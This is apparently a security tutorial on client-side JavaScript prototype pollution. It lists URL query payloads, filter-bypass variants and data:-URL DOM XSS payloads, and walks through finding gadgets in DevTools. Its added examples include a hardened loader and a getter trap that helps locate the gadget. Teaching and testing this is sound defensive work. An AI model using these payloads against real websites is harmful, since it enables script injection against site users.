Prototype Pollution in Client-Side

Last modified: 2023-04-10


Prototype Pollution is a JavaScript vulnerability that allows attackers to add arbitrary properties to global object prototypes, usually Object.prototype. Because almost every object inherits from Object.prototype, a property injected there appears on objects the application never set it on, and code that reads such a property without an own-property check behaves as if the attacker had configured it. The vulnerability exists both in Node.js applications and in client-side JavaScript running in the browser; this page covers the client side, where the attacker-controlled source is typically the URL that the page's own JavaScript parses.


Check whether we can assign an arbitrary property via the URL query string. Try the following variants (foo and bar are placeholders for the property name and value):

    ?__proto__[foo]=bar
    ?constructor[prototype][foo]=bar

    # Bypass sanitization
    # A filter that removes __proto__ or prototype with a single, non-recursive
    # replacement can be defeated by nesting the token inside itself: after the
    # removal the remaining characters re-form the original token.
    ?__pro__proto__to__[foo]=bar
    ?constructor[prototype][foo]=bar
    ?constructor[protoprototypetype][foo]=bar

Open the browser console and type the following to check whether the property from the payload above now lives on Object.prototype (any freshly created object, such as ({}).foo, inherits it too):

    Object.prototype.foo
    // the expected output: "bar"


If our payload reaches a property that an HTML element is built from after the page loads, we can turn the pollution into DOM-based XSS.
Assume the property is named "source_url" and its value is assigned to the "src" of a script element. The name of the property the page actually reads has to be found by reviewing the JavaScript loaded by the site (see Finding Gadgets below). A data: URL loaded as a script source executes its body; the trailing "-" in the last variant keeps the expression syntactically valid when the sink concatenates more JavaScript after the value.

    ?__proto__[source_url]=data:,alert(1);
    ?constructor[prototype][source_url]=data:,alert(1);
    ?__proto__[source_url]=alert(1)-
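As an added example (not code from the original page), this is the gadget shape just described, a config property copied into a script element's src, next to its hardened form. The property name source_url follows the text; the config object, the default URL, the allowed origin and the element factory are assumptions, and the factory is stubbed so the file also runs in Node.

```javascript
// Added example, not from the original page. Names and URLs are assumptions.

const DEFAULT_SRC = 'https://static.example/search.js'; // assumed default

// Stand-in for document.createElement so the logic is testable outside a
// browser; in the page, pass document.createElement.bind(document) instead.
function fakeCreateElement(tag) {
  return { tagName: tag.toUpperCase(), src: '' };
}

// Gadget: config never had an own source_url, so after pollution the lookup
// falls through to Object.prototype.source_url. With a real DOM, appending the
// returned element loads data:,alert(1); as a script and the payload executes.
function loadScriptVulnerable(config, createElement = fakeCreateElement) {
  const script = createElement('script');
  script.src = config.source_url || DEFAULT_SRC;
  return script;
}

// Hardened: honour only own properties, and only URLs on an allowed origin.
// A polluted value lives on the prototype, so it never passes hasOwnProperty;
// an attacker who can set an own property directly is stopped by the origin check
// (the origin of a data: URL is "null", so it is rejected too).
const ALLOWED_ORIGIN = 'https://static.example'; // assumed
function loadScriptHardened(config, createElement = fakeCreateElement) {
  const script = createElement('script');
  let src = DEFAULT_SRC;
  if (Object.prototype.hasOwnProperty.call(config, 'source_url')) {
    const candidate = String(config.source_url);
    try {
      if (new URL(candidate).origin === ALLOWED_ORIGIN) src = candidate;
    } catch {
      // not a parseable URL: keep the default
    }
  }
  script.src = src;
  return script;
}

// Simulates the pollution a ?__proto__[source_url]=... payload produces, runs
// the loader against a config that does not define source_url, and cleans up.
function srcAfterPollution(loader, payload, config = { query: 'hello' }) {
  Object.prototype.source_url = payload;
  try {
    return loader(config).src;
  } finally {
    delete Object.prototype.source_url;
  }
}
```

srcAfterPollution(loadScriptVulnerable, 'data:,alert(1);') returns the payload as the script source, while the hardened loader keeps the default. The own-property check alone is not enough on its own: if the same parser lets the attacker write ordinary top-level keys, an own source_url is attacker-controlled too, which is what the origin allow-list is for.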

Finding Gadgets

  1. In the browser, open DevTools and click the Sources (Chrome) or Debugger (Firefox) tab, then find the JavaScript code that reads the property we polluted. Searching all loaded sources for the candidate property name, or for sinks such as ".src =" and "innerHTML", narrows this down quickly.
  2. Once the line is found, click its line number in the left gutter to add a breakpoint, then reload the page with the payload in the URL.
  3. When execution pauses, the breakpoint line is highlighted. Hover over the target property to see the value currently assigned to it; if it shows our value, the lookup fell through to Object.prototype.
  4. Adjust the payload until it executes in that sink, re-checking the property's value at each attempt.
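As an added example (not code from the original page), the following complements the breakpoint steps above with a getter trap: instead of guessing which line reads the polluted property, define an accessor for it on Object.prototype that records the call stack of every read and still hands back the payload. The property name, the recording format and the sample gadget are assumptions; in a browser, replacing the recording with a debugger; statement pauses DevTools on the exact reading line.

```javascript
// Added example, not from the original page. Names are assumptions.

// Installs a getter on Object.prototype for `prop`. Any object without its own
// `prop` that is read for it falls through here, so the stack captured in the
// getter points at the gadget. Returns the recorded reads and a release function.
function trapPrototypeRead(prop, value) {
  const reads = [];
  Object.defineProperty(Object.prototype, prop, {
    configurable: true, // so release() can remove it again
    enumerable: true,   // matches what a plain assignment produces, so for-in gadgets also trigger
    get() {
      const stack = new Error().stack;   // non-standard but supported by all major engines
      // `this` is the receiver whose lookup fell through; its own keys help
      // identify which config object the gadget was reading.
      reads.push({ receiverKeys: Object.keys(this), stack });
      return value; // hand the payload back so the gadget keeps running
    },
  });
  return {
    reads,
    release() {
      delete Object.prototype[prop];
    },
  };
}

// Constructed gadget for the demonstration: reads config.source_url without an
// own-property check, as the real gadget on a vulnerable page would.
function suspectedGadget(config) {
  return 'script src=' + (config.source_url || 'default.js');
}

// Runs a function while the trap is installed and always releases it afterwards.
function withTrap(prop, value, fn) {
  const trap = trapPrototypeRead(prop, value);
  try {
    return { result: fn(), reads: trap.reads };
  } finally {
    trap.release();
  }
}
```

With the trap installed, the recorded stack for a read contains the name of the reading function (here suspectedGadget), which is the line to set the breakpoint on in step 2. Because the getter is enumerable, like real pollution it shows up in for-in loops and JSON.stringify of every object while installed, so keep the window short and always release it.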